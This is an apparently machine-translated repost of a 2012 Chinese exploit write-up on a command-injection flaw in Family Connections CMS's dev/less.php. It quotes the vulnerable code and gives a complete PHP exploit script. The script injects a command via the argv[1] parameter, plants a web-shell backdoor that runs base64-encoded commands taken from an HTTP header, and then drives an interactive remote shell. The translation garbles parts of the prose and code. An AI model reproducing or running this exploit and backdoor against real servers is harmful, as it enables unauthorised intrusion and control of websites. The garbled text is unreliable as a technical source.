Family Connections CMS v2. 5. 0-v2. 7. 1 (less.php) remote command execution exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201235157
Type myhack58
Reporter 佚名
Modified 2012-10-13T00:00:00


Author: TPCS

From: 90sec


0x01 introduction

Recently in practice some PoC, to find this old cave to practice hand, the first PoC released is in the exploitDB on, just not posted the link, we go to search under it. A start to get to the original PoC, want to search under related content to see nothing information and the like, the results of the search out content, and really makes me want to curse, the domestic about this vulnerability is, basically, the people of the original paste up, a little Description at all. And exploitDB on the PoC is limited, the PoC of the operating environment if linux, the goal of the establishment of the station environment if linux, so I draw a conclusion that these patches PoC of assholes, even the test didn't do it to stick out and give yourself up to force it.

Well, whining hair done, into the chase. This vulnerability is mainly formed of the reason is due to the/dev/less. php this file, use the system function directly will not do any filtering of the variable$theme is insert the parameters, and the result of the command execution issues. The problematic code is as follows:

$theme = isset($argv[1]) ? $argv[1] : 'default'; system("clear"); if (file_exists("$dir/themes/$theme/style. css")) { echo "\n[ themes/$theme/style. css ] already exists.\ n\n"; echo "Overwrite [ y/n ] ? "; $handle = fopen ("php://stdin","r"); $line = fgets($handle); if (trim($line) != 'y') { exit; } } $worked = system("php-q ~/bin/lessphp/lessc $dir/themes/$theme/dev. less > $dir/themes/$theme/style. css");

0x02 use

Although, their own test the original PoC, tangled for a while, but later by their capture analysis, to understand generally the problem with this process, your own also learned a lot of things. Slightly explain the problem I encountered, linux and windows command line operations, in connection of the character is somewhat different, for example under windows, enter“echo hello ; net user”will print out“hello ; net user”, but under linux, enter“echo hello ; ifconfig”it will print hello, and implementation of ifconfig. The original PoC is for thelinux serverwritten, so it's the sent command with the“;”, so I'm in for the windows Server implementation of the process will be“;”to&. The specific implementation method, we see the back of the PoC.

This vulnerability of the use, but also to the global variable coverage of the content, so in PHP5. 3 previous versions, it has to be register_globals turned on. But in PHP5. After 3, register_globals this parameter to cancel out, that is PHP5. After 3 register_gloals is always closed, this problem in 5. After 3 will not exist.

0x03 PoC

Write the PoC had encountered one on default_socket_timeout understanding of the problem, a little test, to understand this set probably mean. Specific content, want to see friends to my blog go see it, there is not much to tell.

I implemented a PoC of the idea and the original author is somewhat different, she directly through a vulnerability in the file system command and the attacker interact to form, but to do so, the interaction time will be very slow. So, I use the method is with regard to vulnerability file for an interaction to perform the system function, to generate a backdoor php file, and then PoC with this php file to interact, the details everyone look at the code.

<? php print_r("

Family Connections CMS v2. 5. 0-v2. 7. 1 (less.php) remote command execution exploit by TPCS <>

"); if ($argc < 3) { print_r("

Usage: php ".$ argv[0]." <Target ip[:port]> <CMS path> <back door file name> Target ip: the target ip address, if not fill in the port, the default is 8 0 CMS path: Family Connections CMS directory Back door file name: use after a successful will generate a backdoor file, 留空则为TPCS.php Example: php ".$ argv[0]." 0 /wp/ fuck.php php ".$ argv[0]." /wp/ Type exit to end the interaction

"); die; } error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout",8); function CPacket($host,$path,$doorname){ $packet = "GET ".$ path."dev/less. php? argv[1]="; $packet .= urlencode("||the echo ^<? php error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?^> > {$doorname} ||"); $packet .= "HTTP/1.1\r\n"; $packet .= "Host:".$ host."\ r\n"; $packet .= "\r\n"; return $packet; } function SPacket($host,$port,$packet){ if(! ($socket = fsockopen($host,$port))) die("\n[-] No response from {$host}:{$port}\n"); fputs($socket,$packet); return stream_get_contents($socket); } function SArgs($argv){ $Args = array(); if(strpos($argv[1],":")){ $HP = explode(":",$argv[1]); $host = $HP[0]; $port = (int) $HP[1]; } else{ $host = $argv[1]; $port = 8 0; } $Args['host'] = $host; $Args['port'] = $port; $Args['path'] = $argv[2]; if($argv[3] != "|| $argv[3] != null) $Args['doorname'] = $argv[3]; else $Args['doorname'] = "TPCS.php"; return $Args; } $myArgs = SArgs($argv); $host = $myArgs['host']; $port = $myArgs['port']; $path = $myArgs['path']; $doorname = $myArgs['doorname']; $myPacket = CPacket($host,$path,$doorname); $mySent = SPacket($host,$port,$myPacket); if(strpos($mySent,"||the echo ^<? php")){ print_r("exploit success\n"); $myPacket = "GET {$path}/dev / {$doorname} HTTP/1.0\r\n"; $myPacket .= "Host: {$host}\r\n"; $myPacket .= "Cmd: %s\r\n"; $myPacket .= "Connection: close\r\n\r\n"; while(1){ print "\nshell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = SPacket($host, $port,sprintf($myPacket, base64_encode($cmd))); preg_match('/\r\n\r\n(.)\ s/s',$response,$value)? print $value[1]:die("looks like it didn't work:-("); } } else print_r("exploit failed"); ?>